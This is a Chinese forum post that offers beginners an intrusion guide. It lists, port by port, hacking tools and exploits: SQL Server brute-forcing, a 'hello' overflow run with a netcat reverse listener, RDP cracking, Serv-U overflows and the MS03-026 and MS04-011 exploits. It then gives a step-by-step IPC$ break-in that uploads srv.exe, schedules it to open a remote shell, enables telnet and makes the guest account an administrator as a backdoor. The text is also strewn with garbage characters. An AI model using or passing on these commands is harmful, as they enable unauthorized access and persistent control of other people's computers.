TA的每日心情 | 衰
2019-8-18 09:37 |
|---|
签到天数: 2 天 [LV.1]初来乍到
|
来源:hi.baidu; I+ N. P. S/ j9 ]+ M
希望对新手入侵有帮助! 9 n% S* s% e* O0 y
1. 1433端口入侵
2 K& Z$ s; i% P4 _8 S scanport.exe 查有1433的机器
4 B( u$ p) j2 W: p SQLScanPass.exe 进行字典暴破(字典是关键)
. _$ B( Q" Z o% x7 R6 p# c 最后 SQLTools.exe入侵对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。
3 s" Q& Z; E% M: @3 W9 _0 x nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口8 g( \1 K6 ^2 o; W+ u C# M2 b
(以上反向的,测试成功)
4 l6 ?6 E" m* E6 V. z! b* \3 Y sqlhelloz.exe 入侵ip 1433 (这个是正向连接)
! R0 o) W% B9 S& U1 \3 N+ h 2. 4899端口入侵
# f! B2 S' R% i S9 U5 y 用4899过滤器.exe,扫描空口令的机器
" ~1 V6 y. I) G4 t% {$ a' R) v2 C 3. 3899的入侵
2 P* n5 s' y3 k3 L 对很早的机器,可以试试3389的溢出(win3389ex.exe)1 R7 B: c" r% ?
对2000的机器,可以试试字典暴破。(tscrack.exe)/ {3 l7 }" _6 L* d
4. 80入侵! ^6 G6 @- t7 G* P
对sp3以前的机器,可以用webdav入侵;: m3 L, J$ [3 }2 O* D
对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)6 C% G5 G F3 i( z+ Y
可以利用SQL进行注入。(啊D的注入软件)。
* [% t) M. A. {8 c2 {2 ~- u 5. serv-u入侵(21端口)
. s7 R' z. R; @/ V 对5. 004及以下系统,可用溢出入侵。(serv5004.exe) `9 I" l2 e( F1 n) w+ K
对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe), ]4 y8 F" G! J Y$ q" K1 k
对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)
6 P7 C" f0 l& Y6 x* Q5 B0 {) }4 {) F 输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码
* ]3 F8 G; B( W @1 }+ o& b* J# f) X$ R 6. 554端口, J7 }' i- ]9 F$ c1 g' \9 \
用real554.exe入侵。
5 r6 @0 _6 a2 f+ t4 L 7. 6129端口
! R: N8 ?4 G/ n* I5 G& J$ i: S 用DameWare6129.exe入侵。
$ S6 ?* d6 J1 O 8. 系统漏洞 n' t7 Z N5 L, Q
利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,进行溢出入侵。
9 y5 ?# J4 [( p; L$ c( {+ l. l# Y9. 3127等端口
# D& Z6 }) j% o) \% a- D3 e" a
" C+ S. m( A# @ 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。4 X1 H/ A' A: B- V& l8 H
10. 其他入侵
3 A6 `0 q9 r# |# ]$ L, G. W7 l+ V 利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。
0 O! c Z( z* l. K# Q# j
$ P; c8 X& f$ ]( F4 h( A& q 经典IPC$入侵
! c, S7 A; h+ W, ]& A Q* @* A
" _8 O# i1 l3 K 1. C:\>net use $">\\127.0.0.1\IPC$ "" /user:"admintitrators"' O) G5 ]& j; e3 W/ Z5 S: g
这是用"流光"扫到的用户名是administrators,密码为"空"的IP地址(气好到家如果是打算攻击的话,就可以用这样的命令来与127.0.0.1建立一个连接,因为密码为"空",所以第一个引号处就不用输入,后面一个双引号里的是用户名,输入administrators,命令即可成功完成。
V6 v5 O7 }* y8 ]5 H9 i* C 2. C:\>copy srv.exe $">\\127.0.0.1\admin$
4 N# l" W$ R; D0 a8 s 先复制srv.exe上去,在流光的Tools目录下就有(这里的$是指admin用户的c:\winnt\system32\,大家还可以使用c$、d$,意思是C盘与D盘,这看你要复制到什么地方去了)。
% e! w p9 _+ o+ J. g 3. C:\>net time file://127.0.0.1/
/ t$ n8 U1 l0 W7 C 查查时间,发现127.0.0.1 的当前时间是 2002/3/19 上午 11:00,命令成功完成。
: r5 ?( W6 \' n, H _ 4. C:\>at file://127.0.0.1/ 11:05 srv.exe
$ Q; F0 l8 v: e1 M$ W 用at命令启动srv.exe吧(这里设置的时间要比主机时间快,不然你怎么启动啊.
5 b) N: L. }2 M7 h; n 5. C:\>net time file://127.0.0.1/
8 Z, m( W8 n9 e 再查查到时间没有?如果127.0.0.1 的当前时间是 2002/3/19 上午 11:05,那就准备开始下面的命令。: m7 S8 p- b9 u7 e) ~6 b
6. C:\>telnet 127.0.0.1 99
5 w4 k( w# S5 y 这里会用到Telnet命令吧,注意端口是99。Telnet默认的是23端口,但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。
7 o1 `# V5 W9 l' d 虽然我们可以Telnet上去了,但是SRV是一次性的,下次登录还要再激活!所以我们打算建立一个Telnet服务!这就要用到ntlm了* u5 ?% {( U5 y/ N! I
7.C:\>copy ntlm.exe $">\\127.0.0.1\admin$8 Z- R: o5 F# ]# ~9 s- d
用Copy命令把ntlm.exe上传到主机上(ntlm.exe也是在《流光》的Tools目录中)。
: k3 y+ b/ f7 Y* U 8. C:\WINNT\system32>ntlm
2 S* P( j$ B+ `3 w) D, @ 输入ntlm启动(这里的C:\WINNT\system32>指的是对方计算机,运行ntlm其实是让这个程序在对方计算机上运行)。当出现"DONE"的时候,就说明已经启动正常。然后使用"net start telnet"来开启Telnet服务!
, a4 H5 e/ W3 U% P 9. Telnet 127.0.0.1,接着输入用户名与密码就进入对方了,操作就像在DOS上操作一样简单!(然后你想做什么?想做什么就做什么吧,哈哈)为了以防万一,我们再把guest激活加到管理组
" l8 t7 U. X( T 10. C:\>net user guest /active:yes+ z2 A; h6 U/ b2 d! |
将对方的Guest用户激活
5 \, C# u$ [" B) r% z8 t 11. C:\>net user guest 1234
; P1 c( _- B# ]' {7 q5 u8 l 将Guest的密码改为1234,或者你要设定的密码8 _# Z, A: o5 s' _7 C$ [3 x( t
12. C:\>net localgroup administrators guest /add# D5 H8 s) [- {1 c7 R+ l
将Guest变为Administrator^_^(如果管理员密码更改,guest帐号没改变的话,下次我们可以用guest再次访问这台计算机) |
|
晒晒我家乡的“夏花、秋枫、冬雪” 上集
大学毕业证+驾驶证=找工作更容易!经贸学车
916壁虎轮换社青秀山烧烤
:◢▇▇▇▇经贸学院音乐社所有传奇人物②
第五届校运会——开幕式
|版主考核中心|『经贸在线』
( 桂ICP备15001539号-2 ) 
IP卡
狗仔卡
发表于 2009-10-16 03:00:18
收藏
分享
淘帖
顶
踩
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
抢沙发
千斤顶
显身卡